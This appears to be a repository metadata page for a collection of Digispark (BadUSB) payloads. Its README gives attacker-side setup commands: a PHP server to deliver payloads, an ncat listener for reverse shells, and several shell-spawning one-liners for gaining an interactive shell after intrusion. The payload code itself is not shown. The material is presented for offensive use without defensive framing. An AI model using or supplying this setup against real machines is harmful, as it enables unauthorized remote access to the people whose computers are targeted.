https://github.com/lascc/digispark-payloads
All the payloads for digispark board
https://github.com/lascc/digispark-payloads
Last synced: 9 months ago
JSON representation
All the payloads for digispark board
- Host: GitHub
- URL: https://github.com/lascc/digispark-payloads
- Owner: LasCC
- Created: 2020-03-23T11:37:21.000Z (about 6 years ago)
- Default Branch: master
- Last Pushed: 2020-03-23T11:50:49.000Z (about 6 years ago)
- Last Synced: 2024-11-13T00:22:13.309Z (over 1 year ago)
- Language: C++
- Size: 6.84 KB
- Stars: 4
- Watchers: 3
- Forks: 2
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Digispark payloads
## All the payloads for digispark board

# Setup the server to send all the payloads
```
php -S 0.0.0.0:80 -T /Users/Name/Dir
```
# For the reverse shell
### Listen all the tcp connexion on port 1234
```
ncat -nvlp [PORT]
```
# Shell spawner
**Using python**
python -c 'import pty; pty.spawn("/bin/sh")'
**Echo**
echo 'os.system('/bin/bash')'
**sh**
/bin/sh -i
**bash**
/bin/bash -i
**Perl**
perl -e 'exec "/bin/sh";'
**From within VI**
:!bash